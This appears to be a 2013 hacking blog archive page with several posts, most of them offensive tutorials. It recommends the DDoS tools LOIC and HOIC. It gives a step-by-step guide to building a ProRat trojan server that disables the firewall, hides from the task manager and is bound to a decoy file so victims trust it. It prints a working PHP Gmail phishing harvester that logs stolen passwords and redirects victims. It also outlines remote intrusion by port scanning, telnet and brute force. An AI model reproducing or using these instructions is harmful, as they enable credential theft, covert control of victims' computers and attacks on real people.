- See more at: Devil hacking point: October 2013

Pages

Wednesday, October 30, 2013

Download Facebook Autolike Newest Generator v4.22 Free


This time we will discuss about software that helps us to famous in FACEBOOK. This application is an application generator that how it works using an application that already has its own browser. Which is where we get online easily and without slow, without requiring a lot of bandwidth.


Simply follow the way below. 
1. First you first download the application here
2. Open Software earlier. 
3. Click the Facebook Tommbol The symbol "F".
4. Click the button and fill in the boxes screwdriver as the content of comment. Like in the picture.




4. Anto check Commen and Friend Mentions. Others can be up to you. 
5. Click DONE. 
6. Enter your Email and Password and Login FACEBOOK. 
7. Symbol and then click Play. In the upper right corner. 

And check whether it is running. Congratulations you superbly managed using FB AutoLikeComment Generator.

LOIC and HOIC Two Best D.Dos Tools


LOW ORBIT ION CANNON (LOIC)
&
HIGH ORBIT ION CANNON (HOIC)
These two D.dos tools are very famous in Cyber World.

Use it at your Own Risk.

How to Hack a Computer by Setting up Pro Rat Server

 

Hi guys..today i am going to show you how to set up ProRat and how to hack a computer using it. Well, i am going to finish up RAT setup articles with this. I will give the counter measures in my next article. As i haven’t written any articles on direct connection Trojans, I decided to write the one on PRORAT.
If you are new to RATing, it is strongly recommended to read my previous articles which give you all the basic and advanced stuff about RATs.


Hack Remote Computers using EXTREME RAT
Trojans and RATs- Know The Facts
DARK-COMET v4.2 RAT TUTORIAL

procedure to setup ProRat

STEP 1. First of all Download ProRat from here. Once it is downloaded extract it

STEP 2. Open up the program and You should see the following window.



STEP 3. Click on the "Create" button in the bottom. Choose "Create ProRat Server".


STEP 4. Next put your IP address so the server could connect to you. You need not enter your IP address manually, you can do this by just clicking on the little arrow. it automatically fills your IP address.
Next put in your e-mail so that when and if a victim gets infected it will send you an email.


STEP 5. Now Open General settings. This tab is the most important tab. In the check boxes, we will choose the server port the program will connect through, the password you will be asked to enter when the victim is infected and you wish to connect with them, and the victim name. As you can see ProRat has the ability to disable the windows firewall and hide itself from being displayed in the task manager. Just follow the steps as shown in the figure.


STEP  6. Click on the Bind with File button to continue. Here you will have the option to bind the trojan server file with another file. You can select an image, text file or PDF file, So as to make the victim trust your file.


STEP  7. Click on the Server Extensions button to continue. Here you choose what kind of server file to generate.    I prefer using .exe files.


STEP  8. Click on Server Icon to continue. Here you will choose an icon for your server file to have. The icons help mask what the file actually is.


STEP  9. After this, press Create server, your server will be in the same folder as ProRat. Start giving this file to your victim. When the victim double click the file, his computer will be in your control.


STEP  10. Now the hacker has lot of options to choose from. He can do many funny things with the victim’s computer.



NOTE: In this tutorial, i put the victim’s IP as 127.0.0.1 as i am testing it on my computer. Inorder to hack a remote computer, you need to get the IP address of your victim. If you dont  know how to find an IP address, you can read my article on finding out remote IP address from here.

Tuesday, October 29, 2013

Gmail PHISHING: Complete Tutorial


Pishing is the process of Stealing sensitive information (silently), such as usernames, passwords, and bank information, by pretending to be someone you’re not. I have already explained it in detail in FACEBOOK phishing. 



This step-by-step guide will show you how you can make your own Gmail Phishing (Fake) page easily...have fun! 



Files we will be creating:
1. phishing.php
2. index.html
3. password.txt

Step 1: Creating phishing.php file 
First of all we need a PHP script which will collect all the form data. Copy the following code in a text editor (notepad) and save it as phishing.php 
<html>  <body> <?php  $handle = fopen("password.txt", "a");  fwrite($handle,$_POST["Email"]); fwrite($handle,"\n");  fwrite($handle,$_POST["Passwd"]); fwrite($handle,"\n");  fwrite($handle,"\n"); fclose($handle) ;  header("Location:https://www.google.com/accounts/ServiceLoginAuth");  exit;  ?> </body> </html>

Step 2 : Creating index.html page
Goto Gmail.com (without logging in) , right click anywhere in the browser and choose view page source. Open the source code in a text editor (notepad).


Step 3: Now a new window will pop-up where you can see all the HTML code.
  We need to look for word action. Press CRTL+F and search for action. You will find two action in the code so choose the right one by looking up the following screen-shot (ie, with form id="gaia_loginform"). Replace the link after action between the "..... " with phishing.php (as in the screen-shot)and save this page as index.html (not index.html.txt!!!).


Step 4: Creating text file (password.txt)
Now make a new empty text file and name it password.txt

Now you have all the three files required

Step 5: Final step
Upload all the 3 files in file manager of your web hosting. If you don't have your own webhosting at present, search for a free web hosing site which gives PHP access. I prefer www.phpzilla.net . 
Sign up for a free web hosting plan on this site. Goto file manager and Upload all the 3 files and save it.

Once everything is up and ready to go, go to the link your host provided you for your website and you should see the Gmail page replica. Type in a username/password and click Sign in. This should have redirected you to the real Gmail page.

Now whoever will try to login for Gmail through your Fake page, his/her Username and Password will be automatically saved in Password.txt file as plain text which you can view easily. Also the the victim won't have a hint that he/she has been hacked since, he/she will be redirected to the original Gmail page and will get a feel as if he/she entered a wrong password by mistake.

Hack a Computer or PC

a How to hack remote computer using IP Address 

Literally, hacking is accessing something or somebody in internetwithout their permission or interest. While, speaking in summary, hacking is very easy job, it is like instead of using front door, finding the hidden door of a house and hijacking the precious things. Among all the hacking, hacking via IP address is one of the most common yet powerful beginning.
You may want to hack the website and put your advertisement there or grab some database information In this type of hacking, you are playing with the web server’s computer instead of the administrator’s computer. Because, www.website.com is hosted in separate web server rather than personal computer.




Another can be accessing your friend’s computer from your home. Again this is IP based and this is possible only when your friend’s computer is online. If it is off or not connected to internet then remote IP hacking is totally impossible.
Well, both of the hacking has the same process. Let’s summarize what we must do.
  1. Confirm the website or a computer you want to hack.
  2. Find or trace their IP address.
  3. Make sure that IP address is online
  4. Scan for open ports
  5. Check for venerable ports
  6. access through the port
  7. Brute-force username and password
Now let me describe in brief in merely basic steps that a child can understand it.
First, getting the IP address of victim.
To get the IP address of the victim website, ping for it in command prompt.
For example,
ping www.google.com
will fetch the IP address of Google.com
a How to hack remote computer using IP Address
This is how we can get the IP address of the victims website.
How about your friend’s PC? You can’t do www.yourfirend’sname.com, can you? Finding your friend’s IP address is little tough job, and tougher it is if he has Dynamic Ip Adress that keeps changing.
One of the widely used method to detect IP address of your friend is by chatting with him.
You might find this article helpful
  • How to get the IP address using MSN/Yahoo/Pidgin messenger
Now you got the IP address right? Is it online?
To know the online status just ping the IP address, if it is online it will reply.
If the IP address is online, scan for the open ports. Open ports are like closed door without locks, you can go inside and outside easily.
Use Advanced Port Scanner to scan all open and venerable ports.
b How to hack remote computer using IP Address
Now you’ve IP address and open port address of the victim, you can now use telnet to try to access them. Make sure that you’ve telnet enabled in your computer or install it from Control panel > Add Remove programs > add windows components.
Now open command prompt and use telnet Command to access to the IP address. Use following syntax for connection.
telnet [IP address] [Port]
c How to hack remote computer using IP Address
You’ll be asked to input login information.
d How to hack remote computer using IP Address
If you can guess the informations easily then it’s OK. Or you can use some brute-forcing tools like this one.
In this way you’ll able to hack remove computer using only IP address

ANONYMOUS SURFING : HOTSPOT SHIELD


Hotspot Shield protects your entire web surfing session; Securing your Connetion at both your home Internet network & Public Internet networks (both wired and wireless). Hotspot Shield protects your Identify by ensuring that all web transactions (shopping, filling out forms, downloads) are secured through HTTPS. Hotspot Shield also makes you private online making your identity invisible to third party websites and ISP’s. Unless you choose to sign into a certain site, you will be anonymous for your entire web session with Hotspot Shield. Hotspot Shield creates a Virtual Private Network (VPN) between your laptop or iPhone and our Internet gateway. This impenetrable tunnel prevents snoopers, hackers, ISP’s, from viewing your web browsing activities, instant messages, downloads, Credite card information or anything else you send over the network. HotSpot Shield Security application employs the latest VPN technology, and is easy to install and use.

Hide IP Easy 5.0.5.6 Full Registerd

Real Hide IP 4.2.9.8

Real Hide IP 4.2.9.8-Silent

Use Real Hide IP to surf anonmously, prevent hackers from monitoring your online activities or identity thieves from stealing your identity and other personal information, send anonymous emails, and un-ban yourself from forums or restricted websites.

Protect your privicy on the InterNet. With Real Hide IP, you can conceal your real IP address, surf anonymously, send anonymous emails through any web based mail system, un-ban yourself from forums or restricted websites, keeping your personal information safe from hackers and identity thieves.




Real Hide IP enables you to be assigned one of our fake IP addresses which can be from different countries such as United States, United Kingdom, France, etc. It works with Internet Explorer, Firefox, Opera, Maxthon, MyIE and is compatible with all types of routers, firewalls, home networks, wireless networks and any other kind of Internet.

Key Features
Hide Your Real IP Address
Be assigned fake IP addresses from different countries to conceal your real IP.
anonymous web suffering
Surf anonymously with fake IP, whenever you want to protect your identy Against Hackers
Protect you from hackers and identity thieves who will be tricked by your fake IP.
Un-ban Yourself from Forums or Restricted Websites
Real Hide IP allows you to access any forums, blogs or websites that have ever banned you.
Prevent Websites from tracking Your Online Activities
Hide your real IP when you are surfing the Internet to prevent you from being tracked by websites.
Download Here